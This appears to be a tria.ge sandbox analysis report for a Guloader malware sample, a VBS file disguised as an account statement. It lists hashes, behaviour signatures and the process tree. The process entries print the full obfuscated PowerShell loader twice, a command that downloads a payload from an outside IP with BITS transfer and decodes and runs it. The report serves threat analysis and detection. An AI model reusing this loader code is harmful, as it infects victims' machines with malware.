Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
18/05/2023, 02:01
General
-
Target
STatEment-of-Accounts-15th-mARCH-2023_ACCOUNT-SUMMARY_REF_QUTYT_125KB_0000000000000000000.vbs
-
Size
31KB
-
MD5
58cba3aa60ed8857deb32d90c47660b1
-
SHA1
4cc7ea4c8fa38f54fe77185e6946ae71341c5bd3
-
SHA256
6ac3b02c068631d96b3fef677a7145b1d1d327af6f8b625f1536959bf69a1ab4
-
SHA512
3e718367014d6ffaefa2531f5fafc1cd3741d25b70298ce7caed2f83041b1ef4f947f90f53b827b3206d161fd19a6776c32f458b6e9e11128f2792640e14657a
-
SSDEEP
768:cuKPqBHxLXe21oomQdDPgl3nn4kFP7vdlrMpu6nq6S:FRxLu21oomQdcl3n4kFPH4DNS
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STatEment-of-Accounts-15th-mARCH-2023_ACCOUNT-SUMMARY_REF_QUTYT_125KB_0000000000000000000.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Photo9 ([String]$Prec){For($Velsesloka=1; $Velsesloka -lt $Prec.Length-1; $Velsesloka+=(1+1)){$alvorso=$alvorso+$Prec.Substring($Velsesloka, 1)};$alvorso;}$Overcarefu=Photo9 ' h tftmpS: /b/N9 1R.S2 4 4 .O1D9P7A.O9B/atVr uUmAmLpT/ R i c icn i nFeOeF.Es nRpG ';$alvorso01=Photo9 'siTewxH ';$Kabareter = Photo9 'T\ sCy s wRoIwU6 4G\SWPion dMoBwPsLPEo w e r S h eSlBl \ vk1G.S0U\ pSo wbeIr sphBe l l .ReAx eB ';.($alvorso01) (Photo9 'O$ CPeMlEe rPiSaVcds 2W=S$ eUn vR:NwEi n d iBr ') ;.($alvorso01) (Photo9 'S$TKMaFbQaSrSePtQeZr =C$TC e l e r iPa cas 2 +t$ K a bTaDrSe tpeRr ') ;.($alvorso01) (Photo9 'e$ BGrPnDeSoMp R=U R(P(PgTwTmpi SwLi n 3 2N_ pSr oMcbe s sR S- F PPrKoBcReus s ITds= $u{ PVIBD } ) .LC o mAmTaSn dSLQiGn eF)s I-Ds p lUi t S[Rc hTa rD] 3K4 ');.($alvorso01) (Photo9 'D$ pAu kLlT = r$SB r nReUo p [S$ B rFn eBoCpT. c oTuTn tf-h2 ] ');.($alvorso01) (Photo9 ' $ D i cSyJcBlMiOeCs cO=U(kTHess tc-UP aTt hA H$ KUa b aPrDeBtSeArP)P r-AA nFdA (V[DIAnMtiPFttrs]T:V: sGiUzRe S-BeAqU 8 ) ') ;if ($Dicycliesc) {.$Kabareter $pukl;} else {;$alvorso00=Photo9 'SSStIa rPt - BBi t sKTCrAa nUsWfTeSr -KSBoSuKrSc eT $SO vfe rCc a r eDfKuA S-CD e s tNiPnOaLtSiPo n L$FC eHl e rRiHaPcSs 2 ';.($alvorso01) (Photo9 'F$SC e lGe r i a cDs 2 =D$Te nOvT:VabpLp dDaKtPa ') ;.($alvorso01) (Photo9 ' I mOp o rJtI-SMUo dMu lSe CB i tTsOTSr a nAsDf eCrH ') ;$Celeriacs2=$Celeriacs2+'\Sinterin.Sli';while (-not $Tiercels) {.($alvorso01) (Photo9 'A$ TPiSeIrIcReRl s =a(STIeDsntO- P aPt hF $UC eDlSeCr iJa casd2 )D ') ;.($alvorso01) $alvorso00;.($alvorso01) (Photo9 ' S tba r tB- SFlHeCeNpU P5R ');}.($alvorso01) (Photo9 'I$FPPhUo tBoP S=S cG eftE- CIo nItDeTn tS R$PC ePl eKr i afcnsS2 ');.($alvorso01) (Photo9 ' $ SKaTcMhIaS P= S[ASWySsst e mG.DC oDnMvBe rItr]F: :PFIr o maBCaOsBeO6F4 SVt r iTnCg ( $ PShUoTt o )V ');.($alvorso01) (Photo9 'F$SaFlPv o rPsBoa2J =V [ SFyKs tUeLmD.ST e xRtB. EInHcBo d iPnSgP]B: :EALSHCaI IF. GIe t S trr i n g (T$sS aEc h a ) ');.($alvorso01) (Photo9 'M$ I m pBrKo vRi sDe = $FaBl vSoArss oA2L. s uPbTs tLr iBn gu( 1T8D5 0 2S7 ,r1A8 9 4O5 )F ');.($alvorso01) $Improvise;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Photo9 ([String]$Prec){For($Velsesloka=1; $Velsesloka -lt $Prec.Length-1; $Velsesloka+=(1+1)){$alvorso=$alvorso+$Prec.Substring($Velsesloka, 1)};$alvorso;}$Overcarefu=Photo9 ' h tftmpS: /b/N9 1R.S2 4 4 .O1D9P7A.O9B/atVr uUmAmLpT/ R i c icn i nFeOeF.Es nRpG ';$alvorso01=Photo9 'siTewxH ';$Kabareter = Photo9 'T\ sCy s wRoIwU6 4G\SWPion dMoBwPsLPEo w e r S h eSlBl \ vk1G.S0U\ pSo wbeIr sphBe l l .ReAx eB ';.($alvorso01) (Photo9 'O$ CPeMlEe rPiSaVcds 2W=S$ eUn vR:NwEi n d iBr ') ;.($alvorso01) (Photo9 'S$TKMaFbQaSrSePtQeZr =C$TC e l e r iPa cas 2 +t$ K a bTaDrSe tpeRr ') ;.($alvorso01) (Photo9 'e$ BGrPnDeSoMp R=U R(P(PgTwTmpi SwLi n 3 2N_ pSr oMcbe s sR S- F PPrKoBcReus s ITds= $u{ PVIBD } ) .LC o mAmTaSn dSLQiGn eF)s I-Ds p lUi t S[Rc hTa rD] 3K4 ');.($alvorso01) (Photo9 'D$ pAu kLlT = r$SB r nReUo p [S$ B rFn eBoCpT. c oTuTn tf-h2 ] ');.($alvorso01) (Photo9 ' $ D i cSyJcBlMiOeCs cO=U(kTHess tc-UP aTt hA H$ KUa b aPrDeBtSeArP)P r-AA nFdA (V[DIAnMtiPFttrs]T:V: sGiUzRe S-BeAqU 8 ) ') ;if ($Dicycliesc) {.$Kabareter $pukl;} else {;$alvorso00=Photo9 'SSStIa rPt - BBi t sKTCrAa nUsWfTeSr -KSBoSuKrSc eT $SO vfe rCc a r eDfKuA S-CD e s tNiPnOaLtSiPo n L$FC eHl e rRiHaPcSs 2 ';.($alvorso01) (Photo9 'F$SC e lGe r i a cDs 2 =D$Te nOvT:VabpLp dDaKtPa ') ;.($alvorso01) (Photo9 ' I mOp o rJtI-SMUo dMu lSe CB i tTsOTSr a nAsDf eCrH ') ;$Celeriacs2=$Celeriacs2+'\Sinterin.Sli';while (-not $Tiercels) {.($alvorso01) (Photo9 'A$ TPiSeIrIcReRl s =a(STIeDsntO- P aPt hF $UC eDlSeCr iJa casd2 )D ') ;.($alvorso01) $alvorso00;.($alvorso01) (Photo9 ' S tba r tB- SFlHeCeNpU P5R ');}.($alvorso01) (Photo9 'I$FPPhUo tBoP S=S cG eftE- CIo nItDeTn tS R$PC ePl eKr i afcnsS2 ');.($alvorso01) (Photo9 ' $ SKaTcMhIaS P= S[ASWySsst e mG.DC oDnMvBe rItr]F: :PFIr o maBCaOsBeO6F4 SVt r iTnCg ( $ PShUoTt o )V ');.($alvorso01) (Photo9 'F$SaFlPv o rPsBoa2J =V [ SFyKs tUeLmD.ST e xRtB. EInHcBo d iPnSgP]B: :EALSHCaI IF. GIe t S trr i n g (T$sS aEc h a ) ');.($alvorso01) (Photo9 'M$ I m pBrKo vRi sDe = $FaBl vSoArss oA2L. s uPbTs tLr iBn gu( 1T8D5 0 2S7 ,r1A8 9 4O5 )F ');.($alvorso01) $Improvise;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
184B
MD53b40bacc965c936504f4371dd98ae1c7
SHA125c251c0f3e08b6bf0d6fe59e0d7ec36469f2a2b
SHA256e21370da4eaea16159591104112eb3017a01d3d22d56909d7dc913b37af92407
SHA5120f27f1a563fbb4b440c13f151661e57a3f43fbc3ae6dd2b7331727027c0f0a34be213487f770349640cce758ed3b859ac01adcef3e291fc7860d6063df066fee
-
Filesize
7KB
MD55501abb389dbe2cc4e437f8b4f5e37a3
SHA1890333431c66b391e2a485aabf5b5e74511f711d
SHA256505e6d826a6ba27260c244043707bd991e061f84d2d327ccab1d063428260169
SHA512088e9ada93ae24a8b1e7d9860f8499f862318f438401a05653eec4f474d29a0a8679b9a5c09c104f148eef5a95ca4fb0f8bddeef5992ac8f712eddcecacb1cd2
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
55.8MB
-
Filesize
4KB
-
Filesize
55.8MB
-
Filesize
55.8MB
-
Filesize
2.1MB
-
Filesize
55.8MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
32KB